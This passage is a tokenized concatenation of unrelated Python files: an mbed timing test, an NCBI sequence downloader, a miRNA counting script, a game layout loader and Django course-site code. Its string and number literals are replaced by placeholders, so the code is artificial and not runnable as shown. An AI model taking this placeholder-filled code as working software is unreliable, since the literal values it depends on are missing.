'<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from time import time <EOL> from mbed_host_tests import BaseHostTest <EOL> class WaitusTest ( BaseHostTest ) : <EOL> """<STR_LIT>""" <EOL> __result = None <EOL> DEVIATION = <NUM_LIT> <EOL> ticks = [ ] <EOL> def _callback_exit ( self , key , value , timeout ) : <EOL> self . notify_complete ( ) <EOL> def _callback_tick ( self , key , value , timestamp ) : <EOL> """<STR_LIT>""" <EOL> self . log ( "<STR_LIT>" + str ( timestamp ) ) <EOL> self . ticks . append ( ( key , value , timestamp ) ) <EOL> def setup ( self ) : <EOL> self . register_callback ( '<STR_LIT>' , self . _callback_exit ) <EOL> self . register_callback ( '<STR_LIT>' , self . _callback_tick ) <EOL> def result ( self ) : <EOL> def sub_timestamps ( t1 , t2 ) : <EOL> delta = t1 - t2 <EOL> deviation = abs ( delta - <NUM_LIT:1.0> ) <EOL> return deviation <= self . DEVIATION <EOL> timestamps = [ timestamp for _ , _ , timestamp in self . ticks ] <EOL> self . log ( str ( timestamps ) ) <EOL> m = map ( sub_timestamps , timestamps [ <NUM_LIT:1> : ] , timestamps [ : - <NUM_LIT:1> ] ) <EOL> self . log ( str ( m ) ) <EOL> self . __result = all ( m ) <EOL> return self . __result <EOL> def teardown ( self ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from multiprocessing import freeze_support <EOL> from mbed_host_tests import init_host_test_cli_params <EOL> from mbed_host_tests . host_tests_runner . host_test_default import DefaultTestSelector <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> freeze_support ( ) <EOL> result = - <NUM_LIT:2> <EOL> test_selector = DefaultTestSelector ( init_host_test_cli_params ( ) ) <EOL> try : <EOL> result = test_selector . execute ( ) <EOL> except ( KeyboardInterrupt , SystemExit ) : <EOL> test_selector . finish ( ) <EOL> result = - <NUM_LIT:3> <EOL> raise <EOL> else : <EOL> test_selector . finish ( ) <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import logging <EOL> import optparse <EOL> import time <EOL> import urllib <EOL> import urllib2 <EOL> import httplib <EOL> import re <EOL> class Eutils : <EOL> def __init__ ( self , options , logger ) : <EOL> self . logger = logger <EOL> self . base = "<STR_LIT>" <EOL> self . query_string = options . query_string <EOL> self . dbname = options . dbname <EOL> if options . outname : <EOL> self . outname = options . outname <EOL> else : <EOL> self . outname = '<STR_LIT>' + '<STR_LIT:.>' + self . dbname + '<STR_LIT>' <EOL> self . ids = [ ] <EOL> self . retmax_esearch = <NUM_LIT> <EOL> self . retmax_efetch = <NUM_LIT:1000> <EOL> self . count = <NUM_LIT:0> <EOL> self . webenv = "<STR_LIT>" <EOL> self . query_key = "<STR_LIT>" <EOL> def retrieve ( self ) : <EOL> """<STR_LIT:U+0020>""" <EOL> self . get_count_value ( ) <EOL> self . get_uids_list ( ) <EOL> self . get_sequences ( ) <EOL> def get_count_value ( self ) : <EOL> """<STR_LIT>""" <EOL> self . logger . info ( "<STR_LIT>" % self . base ) <EOL> self . logger . info ( "<STR_LIT>" % <EOL> ( self . query_string , self . dbname ) ) <EOL> querylog = self . esearch ( self . dbname , self . query_string , '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT:count>" ) <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> for line in querylog : <EOL> self . logger . debug ( line . rstrip ( ) ) <EOL> if '<STR_LIT>' in line : <EOL> self . count = int ( line [ line . find ( '<STR_LIT>' ) + len ( '<STR_LIT>' ) : line . find ( '<STR_LIT>' ) ] ) <EOL> self . logger . info ( "<STR_LIT>" % self . count ) <EOL> def get_uids_list ( self ) : <EOL> """<STR_LIT>""" <EOL> retmax = self . retmax_esearch <EOL> if ( self . count > retmax ) : <EOL> num_batches = ( self . count / retmax ) + <NUM_LIT:1> <EOL> else : <EOL> num_batches = <NUM_LIT:1> <EOL> self . logger . info ( "<STR_LIT>" % retmax ) <EOL> self . logger . info ( "<STR_LIT>" % num_batches ) <EOL> for n in range ( num_batches ) : <EOL> querylog = self . esearch ( self . dbname , self . query_string , n * retmax , retmax , '<STR_LIT>' ) <EOL> for line in querylog : <EOL> if '<STR_LIT>' in line and '<STR_LIT>' in line : <EOL> uid = ( line [ line . find ( '<STR_LIT>' ) + len ( '<STR_LIT>' ) : line . find ( '<STR_LIT>' ) ] ) <EOL> self . ids . append ( uid ) <EOL> self . logger . info ( "<STR_LIT>" % len ( self . ids ) ) <EOL> def esearch ( self , db , term , retstart , retmax , rettype ) : <EOL> url = self . base + "<STR_LIT>" <EOL> self . logger . debug ( "<STR_LIT>" % url ) <EOL> values = { '<STR_LIT>' : db , <EOL> '<STR_LIT>' : term , <EOL> '<STR_LIT>' : rettype , <EOL> '<STR_LIT>' : retstart , <EOL> '<STR_LIT>' : retmax } <EOL> data = urllib . urlencode ( values ) <EOL> self . logger . debug ( "<STR_LIT>" % str ( data ) ) <EOL> req = urllib2 . Request ( url , data ) <EOL> response = urllib2 . urlopen ( req ) <EOL> querylog = response . readlines ( ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> return querylog <EOL> def epost ( self , db , ids ) : <EOL> url = self . base + "<STR_LIT>" <EOL> self . logger . debug ( "<STR_LIT>" % url ) <EOL> values = { '<STR_LIT>' : db , <EOL> '<STR_LIT:id>' : ids } <EOL> data = urllib . urlencode ( values ) <EOL> req = urllib2 . Request ( url , data ) <EOL> req = urllib2 . Request ( url , data ) <EOL> serverResponse = False <EOL> while not serverResponse : <EOL> try : <EOL> response = urllib2 . urlopen ( req ) <EOL> serverResponse = True <EOL> except : <EOL> e = sys . exc_info ( ) [ <NUM_LIT:0> ] <EOL> self . logger . info ( "<STR_LIT>" % e ) <EOL> self . logger . info ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:10> ) <EOL> querylog = response . readlines ( ) <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> for line in querylog : <EOL> self . logger . debug ( line . rstrip ( ) ) <EOL> if '<STR_LIT>' in line : <EOL> self . query_key = str ( line [ line . find ( '<STR_LIT>' ) + len ( '<STR_LIT>' ) : line . find ( '<STR_LIT>' ) ] ) <EOL> if '<STR_LIT>' in line : <EOL> self . webenv = str ( line [ line . find ( '<STR_LIT>' ) + len ( '<STR_LIT>' ) : line . find ( '<STR_LIT>' ) ] ) <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> self . logger . debug ( "<STR_LIT>" % self . query_key ) <EOL> self . logger . debug ( "<STR_LIT>" % self . webenv ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> def efetch ( self , db , query_key , webenv ) : <EOL> url = self . base + "<STR_LIT>" <EOL> self . logger . debug ( "<STR_LIT>" % url ) <EOL> values = { '<STR_LIT>' : db , <EOL> '<STR_LIT>' : query_key , <EOL> '<STR_LIT>' : webenv , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT:text>" } <EOL> data = urllib . urlencode ( values ) <EOL> req = urllib2 . Request ( url , data ) <EOL> self . logger . debug ( "<STR_LIT>" % str ( data ) ) <EOL> req = urllib2 . Request ( url , data ) <EOL> serverTransaction = False <EOL> counter = <NUM_LIT:0> <EOL> while not serverTransaction : <EOL> counter += <NUM_LIT:1> <EOL> self . logger . info ( "<STR_LIT>" % ( counter ) ) <EOL> try : <EOL> response = urllib2 . urlopen ( req ) <EOL> fasta = response . read ( ) <EOL> if ( "<STR_LIT>" in fasta ) or ( not fasta . startswith ( "<STR_LIT:>>" ) ) : <EOL> serverTransaction = False <EOL> else : <EOL> serverTransaction = True <EOL> except urllib2 . HTTPError as e : <EOL> serverTransaction = False <EOL> self . logger . info ( "<STR_LIT>" % ( e . code , e . read ( ) ) ) <EOL> except httplib . IncompleteRead as e : <EOL> serverTransaction = False <EOL> self . logger . info ( "<STR_LIT>" % ( e . partial ) ) <EOL> fasta = self . sanitiser ( self . dbname , fasta ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> return fasta <EOL> def sanitiser ( self , db , fastaseq ) : <EOL> if db not in "<STR_LIT>" : return fastaseq <EOL> regex = re . compile ( r"<STR_LIT>" ) <EOL> sane_seqlist = [ ] <EOL> seqlist = fastaseq . split ( "<STR_LIT>" ) <EOL> for seq in seqlist [ : - <NUM_LIT:1> ] : <EOL> fastalines = seq . split ( "<STR_LIT:\n>" ) <EOL> if len ( fastalines ) < <NUM_LIT:2> : <EOL> self . logger . info ( "<STR_LIT>" % ( "<STR_LIT:|>" . join ( fastalines [ <NUM_LIT:0> ] . split ( "<STR_LIT:|>" ) [ : <NUM_LIT:4> ] ) ) ) <EOL> self . logger . info ( "<STR_LIT>" % ( "<STR_LIT:|>" . join ( fastalines [ <NUM_LIT:0> ] . split ( "<STR_LIT:|>" ) [ : <NUM_LIT:4> ] ) ) ) <EOL> continue <EOL> if db == "<STR_LIT>" : <EOL> badnuc = <NUM_LIT:0> <EOL> for nucleotide in fastalines [ <NUM_LIT:1> ] : <EOL> if nucleotide not in "<STR_LIT>" : <EOL> badnuc += <NUM_LIT:1> <EOL> if float ( badnuc ) / len ( fastalines [ <NUM_LIT:1> ] ) > <NUM_LIT> : <EOL> self . logger . info ( "<STR_LIT>" % ( float ( badnuc ) / len ( fastalines [ <NUM_LIT:1> ] ) , "<STR_LIT:|>" . join ( fastalines [ <NUM_LIT:0> ] . split ( "<STR_LIT:|>" ) [ : <NUM_LIT:4> ] ) , fastalines [ <NUM_LIT:1> ] ) ) <EOL> self . logger . info ( "<STR_LIT>" % ( fastalines [ <NUM_LIT:0> ] . split ( "<STR_LIT:|>" ) [ : <NUM_LIT:4> ] ) ) <EOL> continue <EOL> fastalines [ <NUM_LIT:0> ] = fastalines [ <NUM_LIT:0> ] . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:_>" ) [ : <NUM_LIT:100> ] <EOL> cleanseq = "<STR_LIT:\n>" . join ( fastalines ) <EOL> sane_seqlist . append ( cleanseq ) <EOL> elif db == "<STR_LIT>" : <EOL> fastalines [ <NUM_LIT:0> ] = fastalines [ <NUM_LIT:0> ] [ <NUM_LIT:0> : <NUM_LIT:100> ] <EOL> fastalines [ <NUM_LIT:0> ] = fastalines [ <NUM_LIT:0> ] . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:_>" ) <EOL> fastalines [ <NUM_LIT:0> ] = fastalines [ <NUM_LIT:0> ] . replace ( "<STR_LIT:[>" , "<STR_LIT:_>" ) <EOL> fastalines [ <NUM_LIT:0> ] = fastalines [ <NUM_LIT:0> ] . replace ( "<STR_LIT:]>" , "<STR_LIT:_>" ) <EOL> fastalines [ <NUM_LIT:0> ] = fastalines [ <NUM_LIT:0> ] . replace ( "<STR_LIT:=>" , "<STR_LIT:_>" ) <EOL> fastalines [ <NUM_LIT:0> ] = fastalines [ <NUM_LIT:0> ] . rstrip ( "<STR_LIT:_>" ) <EOL> fastalines [ <NUM_LIT:0> ] = re . sub ( regex , "<STR_LIT:_>" , fastalines [ <NUM_LIT:0> ] ) <EOL> cleanseq = "<STR_LIT:\n>" . join ( fastalines ) <EOL> sane_seqlist . append ( cleanseq ) <EOL> self . logger . info ( "<STR_LIT>" % ( len ( sane_seqlist ) ) ) <EOL> return "<STR_LIT:\n>" . join ( sane_seqlist ) <EOL> def get_sequences ( self ) : <EOL> """<STR_LIT>""" <EOL> batch_size = self . retmax_efetch <EOL> count = self . count <EOL> uids_list = self . ids <EOL> self . logger . info ( "<STR_LIT>" % batch_size ) <EOL> self . logger . info ( "<STR_LIT>" % ( ( count / batch_size ) + <NUM_LIT:1> ) ) <EOL> with open ( self . outname , '<STR_LIT:w>' ) as out : <EOL> for start in range ( <NUM_LIT:0> , count , batch_size ) : <EOL> end = min ( count , start + batch_size ) <EOL> batch = uids_list [ start : end ] <EOL> self . epost ( self . dbname , "<STR_LIT:U+002C>" . join ( batch ) ) <EOL> mfasta = '<STR_LIT>' <EOL> while not mfasta : <EOL> self . logger . info ( "<STR_LIT>" % ( ( start / batch_size ) + <NUM_LIT:1> ) ) <EOL> mfasta = self . efetch ( self . dbname , self . query_key , self . webenv ) <EOL> out . write ( mfasta + '<STR_LIT:\n>' ) <EOL> LOG_FORMAT = '<STR_LIT>' <EOL> LOG_DATEFMT = '<STR_LIT>' <EOL> LOG_LEVELS = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __main__ ( ) : <EOL> """<STR_LIT>""" <EOL> parser = optparse . OptionParser ( description = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , choices = LOG_LEVELS , default = '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> ( options , args ) = parser . parse_args ( ) <EOL> if len ( args ) > <NUM_LIT:0> : <EOL> parser . error ( '<STR_LIT>' ) <EOL> log_level = getattr ( logging , options . loglevel ) <EOL> kwargs = { '<STR_LIT>' : LOG_FORMAT , <EOL> '<STR_LIT>' : LOG_DATEFMT , <EOL> '<STR_LIT>' : log_level } <EOL> if options . logfile : <EOL> kwargs [ '<STR_LIT:filename>' ] = options . logfile <EOL> logging . basicConfig ( ** kwargs ) <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> E = Eutils ( options , logger ) <EOL> E . retrieve ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> __main__ ( ) </s>
<s> import sys , subprocess <EOL> from collections import defaultdict <EOL> def get_fasta ( index = "<STR_LIT>" ) : <EOL> p = subprocess . Popen ( args = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:0>" , index ] , stdout = subprocess . PIPE , stderr = subprocess . STDOUT ) <EOL> outputlines = p . stdout . readlines ( ) <EOL> p . wait ( ) <EOL> miR_sequence_liste = { } <EOL> for line in outputlines : <EOL> if line [ <NUM_LIT:0> ] == "<STR_LIT:>>" : <EOL> miR_name = line [ <NUM_LIT:1> : - <NUM_LIT:1> ] . split ( ) [ <NUM_LIT:0> ] <EOL> else : <EOL> miR_sequence_liste [ miR_name ] = line [ : - <NUM_LIT:1> ] <EOL> return miR_sequence_liste <EOL> class Mirna : <EOL> def __init__ ( self , name , sequence ) : <EOL> self . name = name <EOL> self . sequence = sequence <EOL> self . matched_reads = [ ] <EOL> self . dicmap = { } <EOL> def addread ( self , offset , size ) : <EOL> self . matched_reads . append ( ( offset , size ) ) <EOL> self . dicmap [ ( offset , size ) ] = self . dicmap . get ( ( offset , size ) , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> return <EOL> def mircount ( self ) : <EOL> return len ( self . matched_reads ) <EOL> def density ( self ) : <EOL> '''<STR_LIT>''' <EOL> map = [ <NUM_LIT:0> for i in range ( len ( self . sequence ) ) ] <EOL> for offset , size in self . dicmap : <EOL> for i in range ( offset , offset + size ) : <EOL> map [ i ] += self . dicmap [ ( offset , size ) ] <EOL> return map <EOL> def normalized_density ( self ) : <EOL> map = self . density ( ) <EOL> maximum = float ( max ( map ) ) or <NUM_LIT:1> <EOL> length = float ( len ( map ) ) or <NUM_LIT:1> <EOL> Total_NoR = self . mircount ( ) <EOL> output = [ "<STR_LIT>" ] <EOL> for i , D in enumerate ( map ) : <EOL> output . append ( "<STR_LIT>" % ( self . name , ( i + <NUM_LIT:1> ) / length , D / maximum , Total_NoR ) ) <EOL> return "<STR_LIT:\n>" . join ( output ) <EOL> def hitmap ( self ) : <EOL> output = [ ] <EOL> output . append ( self . name ) <EOL> output . append ( "<STR_LIT>" % ( self . sequence , "<STR_LIT>" , "<STR_LIT:size>" , "<STR_LIT>" ) ) <EOL> for pos_size in sorted ( self . dicmap ) : <EOL> seq = self . sequence [ pos_size [ <NUM_LIT:0> ] : pos_size [ <NUM_LIT:0> ] + pos_size [ <NUM_LIT:1> ] ] <EOL> output . append ( "<STR_LIT>" % ( "<STR_LIT:.>" * len ( self . sequence [ : pos_size [ <NUM_LIT:0> ] ] ) , seq , "<STR_LIT:.>" * len ( self . sequence [ pos_size [ <NUM_LIT:0> ] + pos_size [ <NUM_LIT:1> ] : ] ) , pos_size [ <NUM_LIT:0> ] + <NUM_LIT:1> , pos_size [ <NUM_LIT:1> ] , self . dicmap [ pos_size ] ) ) <EOL> return "<STR_LIT:\n>" . join ( output ) <EOL> def splitcount ( self , shift ) : <EOL> median = len ( self . sequence ) / <NUM_LIT:2> <EOL> splitsite = <NUM_LIT:0> <EOL> scores = [ ] <EOL> for i in range ( median - shift , median + shift + <NUM_LIT:1> ) : <EOL> countsum = <NUM_LIT:0> <EOL> for pos_size in self . dicmap : <EOL> if pos_size [ <NUM_LIT:0> ] <= i <= pos_size [ <NUM_LIT:0> ] + pos_size [ <NUM_LIT:1> ] - <NUM_LIT:1> : continue <EOL> else : countsum = countsum + self . dicmap [ pos_size ] <EOL> scores . append ( countsum ) <EOL> firstmax = scores . index ( max ( scores ) ) <EOL> scores . reverse ( ) <EOL> lastmax = scores . index ( max ( scores ) ) <EOL> scores . reverse ( ) <EOL> split_selected = firstmax + len ( scores [ firstmax : - lastmax ] ) / <NUM_LIT:2> + median - shift <EOL> mir5p = <NUM_LIT:0> <EOL> mir3p = <NUM_LIT:0> <EOL> for pos_size in self . dicmap : <EOL> if pos_size [ <NUM_LIT:0> ] <= split_selected <= pos_size [ <NUM_LIT:0> ] + pos_size [ <NUM_LIT:1> ] - <NUM_LIT:1> : continue <EOL> elif split_selected <= pos_size [ <NUM_LIT:0> ] : mir3p = mir3p + self . dicmap [ pos_size ] <EOL> else : mir5p = mir5p + self . dicmap [ pos_size ] <EOL> return "<STR_LIT>" % ( self . name , mir5p , self . name , mir3p ) <EOL> def splitcount_2 ( self , shift ) : <EOL> density_map = self . density ( ) <EOL> median = len ( self . sequence ) / <NUM_LIT:2> <EOL> minimum = <NUM_LIT:0> <EOL> densitydic = dict ( [ ( i , density ) for i , density in enumerate ( density_map ) if median - shift <= i <= median + shift ] ) <EOL> revdic = dict ( map ( lambda item : ( item [ <NUM_LIT:1> ] , item [ <NUM_LIT:0> ] ) , densitydic . items ( ) ) ) <EOL> mindensity_offset = revdic [ min ( revdic . keys ( ) ) ] <EOL> mir5p = <NUM_LIT:0> <EOL> mir3p = <NUM_LIT:0> <EOL> for pos_size in self . dicmap : <EOL> if mindensity_offset in range ( pos_size [ <NUM_LIT:0> ] , pos_size [ <NUM_LIT:0> ] + pos_size [ <NUM_LIT:1> ] ) : continue <EOL> if mindensity_offset <= pos_size [ <NUM_LIT:0> ] : mir3p = mir3p + self . dicmap [ pos_size ] <EOL> else : mir5p = mir5p + self . dicmap [ pos_size ] <EOL> return "<STR_LIT>" % ( self . name , mir5p , self . name , mir3p ) <EOL> mirdict = get_fasta ( sys . argv [ <NUM_LIT:2> ] ) <EOL> dicobject = { } <EOL> for mir in mirdict : <EOL> dicobject [ mir ] = Mirna ( mir , mirdict [ mir ] ) <EOL> F = open ( sys . argv [ <NUM_LIT:1> ] , "<STR_LIT:r>" ) <EOL> for line in F : <EOL> fields = line . split ( ) <EOL> name = fields [ <NUM_LIT:1> ] <EOL> offset = int ( fields [ <NUM_LIT:2> ] ) <EOL> sequence = fields [ <NUM_LIT:3> ] <EOL> dicobject [ name ] . addread ( offset , len ( sequence ) ) <EOL> F . close ( ) <EOL> F = open ( sys . argv [ <NUM_LIT:4> ] , "<STR_LIT:w>" ) <EOL> for mir in sorted ( dicobject ) : <EOL> print >> F , dicobject [ mir ] . hitmap ( ) <EOL> for i , counts in enumerate ( dicobject [ mir ] . density ( ) ) : <EOL> print >> F , "<STR_LIT>" % ( i + <NUM_LIT:1> , counts ) <EOL> print >> F <EOL> print >> F , dicobject [ mir ] . normalized_density ( ) <EOL> F . close ( ) <EOL> F = open ( sys . argv [ <NUM_LIT:5> ] , "<STR_LIT:w>" ) <EOL> print >> F , "<STR_LIT>" % sys . argv [ <NUM_LIT:3> ] <EOL> for mir in sorted ( dicobject ) : <EOL> print >> F , dicobject [ mir ] . splitcount_2 ( <NUM_LIT:15> ) </s>
<s> import base64 <EOL> import random <EOL> import zlib <EOL> from . containers import Mesh <EOL> """<STR_LIT>""" <EOL> try : <EOL> from . import __layouts <EOL> except SyntaxError as err : <EOL> print ( "<STR_LIT>" ) <EOL> print ( err ) <EOL> class LayoutEncodingException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def load_layout ( layout_name = None , layout_file = None ) : <EOL> """<STR_LIT>""" <EOL> if layout_name and not layout_file : <EOL> layout_name = layout_name <EOL> layout_string = get_layout_by_name ( layout_name ) <EOL> elif layout_file and not layout_name : <EOL> with open ( layout_file ) as file : <EOL> layout_name = file . name <EOL> layout_string = file . read ( ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return layout_name , layout_string <EOL> def get_random_layout ( filter = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> layouts_names = [ item for item in get_available_layouts ( ) if filter in item ] <EOL> layout_choice = random . choice ( layouts_names ) <EOL> return layout_choice , get_layout_by_name ( layout_choice ) <EOL> def get_available_layouts ( filter = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return [ item for item in dir ( __layouts ) if item . startswith ( '<STR_LIT>' ) and <EOL> filter in item ] <EOL> def get_layout_by_name ( layout_name ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return zlib . decompress ( base64 . decodebytes ( __layouts . __dict__ [ layout_name ] . encode ( ) ) ) . decode ( ) <EOL> except KeyError as ke : <EOL> raise ValueError ( "<STR_LIT>" % ke . args ) <EOL> class Layout : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , layout_str , layout_chars , number_bots ) : <EOL> self . number_bots = number_bots <EOL> self . layout_chars = layout_chars <EOL> self . stripped = self . strip_layout ( layout_str ) <EOL> self . check_layout ( self . stripped , self . layout_chars , self . number_bots ) <EOL> self . shape = self . layout_shape ( self . stripped ) <EOL> @ staticmethod <EOL> def strip_layout ( layout_str ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT:\n>' . join ( [ line . strip ( ) for line in layout_str . split ( '<STR_LIT:\n>' ) ] ) . strip ( ) <EOL> @ staticmethod <EOL> def check_layout ( layout_str , layout_chars , number_bots ) : <EOL> """<STR_LIT>""" <EOL> bot_ids = [ str ( i ) for i in range ( number_bots ) ] <EOL> existing_bots = [ ] <EOL> legal = layout_chars + bot_ids + [ '<STR_LIT:\n>' ] <EOL> for c in layout_str : <EOL> if c not in legal : <EOL> raise LayoutEncodingException ( <EOL> "<STR_LIT>" % c ) <EOL> if c in bot_ids : <EOL> if c in existing_bots : <EOL> raise LayoutEncodingException ( <EOL> "<STR_LIT>" % c ) <EOL> else : <EOL> existing_bots . append ( c ) <EOL> existing_bots . sort ( ) <EOL> if bot_ids != existing_bots : <EOL> missing = [ str ( i ) for i in set ( bot_ids ) . difference ( set ( existing_bots ) ) ] <EOL> missing . sort ( ) <EOL> raise LayoutEncodingException ( <EOL> '<STR_LIT>' <EOL> % ( number_bots , missing ) ) <EOL> lines = layout_str . split ( '<STR_LIT:\n>' ) <EOL> for i in range ( len ( lines ) ) : <EOL> if len ( lines [ i ] ) != len ( lines [ <NUM_LIT:0> ] ) : <EOL> raise LayoutEncodingException ( <EOL> '<STR_LIT>' + '<STR_LIT>' <EOL> % ( i , len ( lines [ i ] ) , len ( lines [ <NUM_LIT:0> ] ) ) ) <EOL> @ staticmethod <EOL> def layout_shape ( layout_str ) : <EOL> """<STR_LIT>""" <EOL> return ( layout_str . find ( '<STR_LIT:\n>' ) , len ( layout_str . split ( '<STR_LIT:\n>' ) ) ) <EOL> def __eq__ ( self , other ) : <EOL> return type ( self ) == type ( other ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> def __str__ ( self ) : <EOL> return self . stripped <EOL> def __repr__ ( self ) : <EOL> return ( "<STR_LIT>" <EOL> % ( self . stripped , self . layout_chars , self . number_bots ) ) <EOL> def as_mesh ( self ) : <EOL> """<STR_LIT>""" <EOL> mesh = Mesh ( * self . shape ) <EOL> mesh . _set_data ( list ( '<STR_LIT>' . join ( self . stripped . split ( '<STR_LIT:\n>' ) ) ) ) <EOL> return mesh <EOL> @ classmethod <EOL> def from_file ( cls , filename , layout_chars , number_bots ) : <EOL> """<STR_LIT>""" <EOL> with open ( filename ) as file : <EOL> lines = file . read ( ) <EOL> return cls ( lines , layout_chars = layout_chars , number_bots = number_bots ) </s>
<s> """<STR_LIT>""" <EOL> import argparse <EOL> from scaffold import projectfolders , projectfiles <EOL> import os <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' , epilog = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , required = True , nargs = <NUM_LIT:1> , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , required = False , nargs = <NUM_LIT:1> , help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> cur_dir = os . getcwd ( ) <EOL> if args . dir != None : <EOL> cur_dir = args . dir [ <NUM_LIT:0> ] <EOL> def main ( ) : <EOL> try : <EOL> projectfolders . create_folders ( args . project [ <NUM_LIT:0> ] , cur_dir ) <EOL> projectfiles . create_files ( args . project [ <NUM_LIT:0> ] , cur_dir ) <EOL> except IOError as e : <EOL> print ( e . strerror ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from django . core . management . base import BaseCommand , CommandError <EOL> from django . conf import settings <EOL> from account . models import Student <EOL> from registrar . models import Course <EOL> from landpage . models import LandpageTopPickCourse <EOL> class Command ( BaseCommand ) : <EOL> help = '<STR_LIT>' <EOL> def handle ( self , * args , ** options ) : <EOL> """<STR_LIT>""" <EOL> course_list = Course . objects . filter ( status = settings . COURSE_AVAILABLE_STATUS ) <EOL> courses = { } <EOL> for course in course_list : <EOL> count = course . students . count ( ) <EOL> courses [ course . id ] = count <EOL> sorted ( courses . values ( ) ) <EOL> try : <EOL> LandpageTopPickCourse . objects . all ( ) . delete ( ) <EOL> except LandpageTopPickCourse . DoesNotExist : <EOL> pass <EOL> index = <NUM_LIT:1> <EOL> max_count = <NUM_LIT:4> <EOL> for course_id in courses . keys ( ) : <EOL> if index < max_count : <EOL> course_obj = Course . objects . get ( id = course_id ) <EOL> LandpageTopPickCourse . objects . create ( <EOL> id = index , <EOL> course = course_obj , <EOL> ) <EOL> index += <NUM_LIT:1> </s>
<s> from django . core . urlresolvers import resolve <EOL> from django . http import HttpRequest <EOL> from django . http import QueryDict <EOL> from django . test import TestCase <EOL> from django . test import Client <EOL> from django . contrib . auth . models import User <EOL> from django . contrib . auth import authenticate , login , logout <EOL> from django . contrib . auth . decorators import login_required <EOL> import json <EOL> from publisher . models import Publication <EOL> from publisher . views import catalog <EOL> TEST_USER_EMAIL = "<STR_LIT>" <EOL> TEST_USER_USERNAME = "<STR_LIT>" <EOL> TEST_USER_PASSWORD = "<STR_LIT:password>" <EOL> class CatalogTestCase ( TestCase ) : <EOL> def tearDown ( self ) : <EOL> User . objects . get ( email = TEST_USER_EMAIL ) . delete ( ) <EOL> def setUp ( self ) : <EOL> User . objects . create_user ( <EOL> email = TEST_USER_EMAIL , <EOL> username = TEST_USER_USERNAME , <EOL> password = TEST_USER_PASSWORD <EOL> ) <EOL> user = User . objects . get ( email = TEST_USER_EMAIL ) <EOL> def test_url_resolves_to_catalog_page_view ( self ) : <EOL> found = resolve ( '<STR_LIT>' ) <EOL> self . assertEqual ( found . func , catalog . catalog_page ) <EOL> def test_catalog_page_returns_correct_html ( self ) : <EOL> client = Client ( ) <EOL> client . login ( <EOL> username = TEST_USER_USERNAME , <EOL> password = TEST_USER_PASSWORD <EOL> ) <EOL> response = client . post ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertIn ( b'<STR_LIT>' , response . content ) <EOL> self . assertIn ( b'<STR_LIT>' , response . content ) </s>
<s> from django . db import models <EOL> from django import forms <EOL> from django . forms import ModelForm , Textarea , TextInput , NumberInput <EOL> from django . forms . extras . widgets import Select , SelectDateWidget <EOL> from registrar . models import EssaySubmission <EOL> from registrar . models import AssignmentSubmission <EOL> from registrar . models import PeerReview <EOL> from registrar . models import CourseDiscussionThread <EOL> from registrar . models import CourseDiscussionPost <EOL> class EssaySubmissionForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = EssaySubmission <EOL> fields = '<STR_LIT>' <EOL> def clean_file ( self ) : <EOL> upload = self . cleaned_data [ '<STR_LIT:file>' ] <EOL> content_type = upload . content_type <EOL> if content_type in [ '<STR_LIT>' ] : <EOL> if upload . _size <= <NUM_LIT> : <EOL> return upload <EOL> else : <EOL> raise forms . ValidationError ( "<STR_LIT>" ) <EOL> else : <EOL> raise forms . ValidationError ( "<STR_LIT>" ) <EOL> class AssignmentSubmissionForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = AssignmentSubmission <EOL> fields = '<STR_LIT>' <EOL> class PeerReviewForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = PeerReview <EOL> fields = [ '<STR_LIT>' , '<STR_LIT:text>' ] <EOL> labels = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:text>' : '<STR_LIT>' , <EOL> } <EOL> widgets = { <EOL> '<STR_LIT:text>' : Textarea ( attrs = { '<STR_LIT:class>' : 